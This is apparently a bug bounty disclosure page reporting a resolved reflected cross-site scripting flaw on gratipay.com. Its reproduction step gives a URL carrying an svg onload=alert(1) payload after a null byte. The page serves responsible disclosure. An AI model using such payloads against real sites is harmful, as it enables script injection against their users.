Loading HuntDB...

Reflected XSS - gratipay.com

Medium
G
Gratipay
Submitted None
Reported by tungpun

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
# Summary I would like to report a Reflected XSS on gratipay.com. # Browsers Verified In * Firefox 55.0.2 (up to date) # Steps To Reproduce Goto this URL: `https://gratipay.com/on/npm/cx%00A<svg onload=alert(1)>` {F215426}

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected